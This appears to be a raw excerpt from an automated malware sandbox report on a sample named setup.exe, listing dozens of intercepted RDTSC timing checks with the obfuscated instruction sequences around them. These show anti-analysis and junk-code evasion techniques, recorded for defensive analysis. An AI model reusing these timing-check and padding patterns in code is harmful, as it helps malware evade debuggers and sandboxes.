Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 3BFBA1 second address: 3BFBA5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 3BFC8C second address: 3BFC90 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 3BFC90 second address: 3BFCA3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F47D8E3B0AFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 3BFCA3 second address: 3BFCBE instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F47D8E48268h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b jp 00007F47D8E48274h 0x00000011 push eax 0x00000012 push edx 0x00000013 jc 00007F47D8E48266h 0x00000019 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 3BFCBE second address: 3BFCD9 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 xchg eax, esi 0x00000007 movsx edx, bx 0x0000000a or ecx, dword ptr [ebp+122D294Bh] 0x00000010 push eax 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 jc 00007F47D8E3B0A6h 0x0000001b rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 3BFCD9 second address: 3BFCDF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 3BFE1F second address: 3BFE31 instructions: 0x00000000 rdtsc 0x00000002 js 00007F47D8E3B0A6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jnc 00007F47D8E3B0A6h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 3BFE31 second address: 3BFE5F instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F47D8E48266h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c pushad 0x0000000d jmp 00007F47D8E48279h 0x00000012 push eax 0x00000013 push edx 0x00000014 jl 00007F47D8E48266h 0x0000001a rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 3BFE5F second address: 3BFE8F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov eax, dword ptr [esp+04h] 0x0000000b pushad 0x0000000c pushad 0x0000000d jbe 00007F47D8E3B0A6h 0x00000013 push ebx 0x00000014 pop ebx 0x00000015 popad 0x00000016 jmp 00007F47D8E3B0ADh 0x0000001b popad 0x0000001c mov eax, dword ptr [eax] 0x0000001e push eax 0x0000001f push edx 0x00000020 push eax 0x00000021 push edx 0x00000022 js 00007F47D8E3B0A6h 0x00000028 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 3BFE8F second address: 3BFE95 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 3BFE95 second address: 3BFE9B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 3BFE9B second address: 3BFE9F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 3BFE9F second address: 3BFEC1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp+04h], eax 0x0000000c pushad 0x0000000d pushad 0x0000000e jmp 00007F47D8E3B0AEh 0x00000013 pushad 0x00000014 popad 0x00000015 popad 0x00000016 pushad 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 3BFFBA second address: 3BFFC7 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 push eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 3BFFC7 second address: 3BFFCB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 3C01AC second address: 3C01B2 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 3C0576 second address: 3C05BA instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pushad 0x00000004 popad 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], eax 0x0000000b push 00000000h 0x0000000d push edx 0x0000000e call 00007F47D8E3B0A8h 0x00000013 pop edx 0x00000014 mov dword ptr [esp+04h], edx 0x00000018 add dword ptr [esp+04h], 00000014h 0x00000020 inc edx 0x00000021 push edx 0x00000022 ret 0x00000023 pop edx 0x00000024 ret 0x00000025 mov edx, dword ptr [ebp+122D3818h] 0x0000002b push 0000001Eh 0x0000002d jmp 00007F47D8E3B0ABh 0x00000032 nop 0x00000033 push esi 0x00000034 push eax 0x00000035 push edx 0x00000036 jc 00007F47D8E3B0A6h 0x0000003c rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 367AF3 second address: 367B07 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 jno 00007F47D8E48266h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop edx 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 push esi 0x00000011 pop esi 0x00000012 push edx 0x00000013 pop edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 367B07 second address: 367B1C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F47D8E3B0B1h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 3E8236 second address: 3E8250 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F47D8E48275h 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 3E8250 second address: 3E8256 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 3E8256 second address: 3E8260 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007F47D8E48266h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 3E8666 second address: 3E866A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 3E87EF second address: 3E87F3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 3E8973 second address: 3E8979 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 3E8979 second address: 3E897D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 3E897D second address: 3E8993 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F47D8E3B0B2h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 3E8AC1 second address: 3E8ACE instructions: 0x00000000 rdtsc 0x00000002 js 00007F47D8E48266h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 3F1861 second address: 3F186B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007F47D8E3B0A6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 3F1E0B second address: 3F1E11 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 3F1E11 second address: 3F1E19 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 3F214F second address: 3F215A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007F47D8E48266h 0x0000000a pop esi 0x0000000b rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 3F22F9 second address: 3F22FD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 3F22FD second address: 3F230F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 jmp 00007F47D8E4826Ch 0x0000000b rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 3F230F second address: 3F233C instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F47D8E3B0A6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007F47D8E3B0B9h 0x0000000f pop edx 0x00000010 pop eax 0x00000011 push ecx 0x00000012 push edi 0x00000013 push ebx 0x00000014 pop ebx 0x00000015 pop edi 0x00000016 push ebx 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 3F29C4 second address: 3F29E3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F47D8E48276h 0x0000000c push eax 0x0000000d pop eax 0x0000000e rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 3F12CE second address: 3F12D7 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push esi 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 3F12D7 second address: 3F12DE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop esi 0x00000007 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 3F12DE second address: 3F12E4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 3F12E4 second address: 3F12E8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 3FD6AD second address: 3FD6D5 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F47D8E3B0B9h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d jl 00007F47D8E3B0A6h 0x00000013 pushad 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 3FDCE6 second address: 3FDCEA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 3FDCEA second address: 3FDCF7 instructions: 0x00000000 rdtsc 0x00000002 js 00007F47D8E3B0A6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 3FDCF7 second address: 3FDCFF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 3FDFAB second address: 3FDFAF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 3FDFAF second address: 3FDFD5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jp 00007F47D8E48268h 0x0000000c jmp 00007F47D8E48275h 0x00000011 push edi 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 3FE285 second address: 3FE2A7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F47D8E3B0B4h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 3FE2A7 second address: 3FE2AB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 3FE2AB second address: 3FE2C6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F47D8E3B0ADh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jp 00007F47D8E3B0A8h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 3FE2C6 second address: 3FE2CC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 3FE2CC second address: 3FE2E7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F47D8E3B0B3h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 401ABC second address: 401AC1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 401AC1 second address: 401B0A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F47D8E3B0B2h 0x00000009 push eax 0x0000000a pop eax 0x0000000b popad 0x0000000c jng 00007F47D8E3B0AEh 0x00000012 jo 00007F47D8E3B0A6h 0x00000018 push edi 0x00000019 pop edi 0x0000001a pop edx 0x0000001b pop eax 0x0000001c push eax 0x0000001d push edx 0x0000001e pushad 0x0000001f push edx 0x00000020 pop edx 0x00000021 jmp 00007F47D8E3B0B9h 0x00000026 push eax 0x00000027 push edx 0x00000028 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 401B0A second address: 401B19 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F47D8E4826Ah 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 401B19 second address: 401B23 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F47D8E3B0ACh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 401368 second address: 4013B3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F47D8E48276h 0x00000007 jmp 00007F47D8E48273h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e jg 00007F47D8E48268h 0x00000014 pop eax 0x00000015 pushad 0x00000016 push eax 0x00000017 push edx 0x00000018 jmp 00007F47D8E48272h 0x0000001d rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4016C4 second address: 4016C9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4016C9 second address: 4016E3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007F47D8E48274h 0x0000000b rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 403F9D second address: 403FA5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 403FA5 second address: 403FBF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F47D8E48270h 0x0000000a pushad 0x0000000b pushad 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 3700B8 second address: 3700C5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pushad 0x00000008 push eax 0x00000009 pop eax 0x0000000a push ebx 0x0000000b pop ebx 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 3700C5 second address: 3700D1 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 pop edx 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 3700D1 second address: 3700D5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 403B58 second address: 403B60 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 403CCA second address: 403CCE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 40AE6B second address: 40AE71 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 40AE71 second address: 40AE75 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 40AE75 second address: 40AE79 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 40AE79 second address: 40AE7F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 40AE7F second address: 40AEAF instructions: 0x00000000 rdtsc 0x00000002 jno 00007F47D8E4826Ch 0x00000008 pushad 0x00000009 pushad 0x0000000a popad 0x0000000b jmp 00007F47D8E4826Eh 0x00000010 pushad 0x00000011 popad 0x00000012 popad 0x00000013 pop edx 0x00000014 pop eax 0x00000015 push eax 0x00000016 push edx 0x00000017 push eax 0x00000018 push edx 0x00000019 je 00007F47D8E48266h 0x0000001f push edi 0x00000020 pop edi 0x00000021 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 40AEAF second address: 40AEC2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 jmp 00007F47D8E3B0ADh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 40AEC2 second address: 40AEE1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F47D8E48279h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 40AEE1 second address: 40AEE5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 40AEE5 second address: 40AEE9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 40AEE9 second address: 40AEEF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 409FD2 second address: 409FEC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F47D8E48276h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 409FEC second address: 409FFB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jne 00007F47D8E3B0A6h 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 409FFB second address: 40A001 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 40A001 second address: 40A01E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push esi 0x00000008 push ecx 0x00000009 push esi 0x0000000a pop esi 0x0000000b pop ecx 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F47D8E3B0AFh 0x00000013 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 40A199 second address: 40A1CA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pop edi 0x00000006 pushad 0x00000007 push edx 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a jmp 00007F47D8E48278h 0x0000000f pop edx 0x00000010 jnc 00007F47D8E48268h 0x00000016 pushad 0x00000017 popad 0x00000018 push eax 0x00000019 push edx 0x0000001a pushad 0x0000001b popad 0x0000001c pushad 0x0000001d popad 0x0000001e rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 40A1CA second address: 40A1D0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 40E420 second address: 40E46F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F47D8E48276h 0x00000007 push edi 0x00000008 jmp 00007F47D8E48274h 0x0000000d pop edi 0x0000000e pop edx 0x0000000f pop eax 0x00000010 pushad 0x00000011 jns 00007F47D8E4826Ah 0x00000017 push eax 0x00000018 push edx 0x00000019 jmp 00007F47D8E48270h 0x0000001e push ebx 0x0000001f pop ebx 0x00000020 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 40E5BC second address: 40E5C6 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 pushad 0x00000008 popad 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 40E5C6 second address: 40E5D2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 jc 00007F47D8E48266h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 40EA1B second address: 40EA27 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jp 00007F47D8E3B0A6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4123D2 second address: 4123DC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pop edx 0x00000006 push ebx 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 412825 second address: 412852 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F47D8E3B0ACh 0x00000008 jp 00007F47D8E3B0A6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 jnp 00007F47D8E3B0B9h 0x00000017 jmp 00007F47D8E3B0B1h 0x0000001c pushad 0x0000001d popad 0x0000001e pushad 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 412852 second address: 412858 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4129B1 second address: 4129C9 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F47D8E3B0B0h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4129C9 second address: 4129DE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F47D8E4826Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push edx 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 41A18C second address: 41A1BA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F47D8E3B0B4h 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F47D8E3B0B3h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 41A34B second address: 41A34F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 41A34F second address: 41A371 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F47D8E3B0B3h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c jo 00007F47D8E3B0A6h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 41A371 second address: 41A377 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
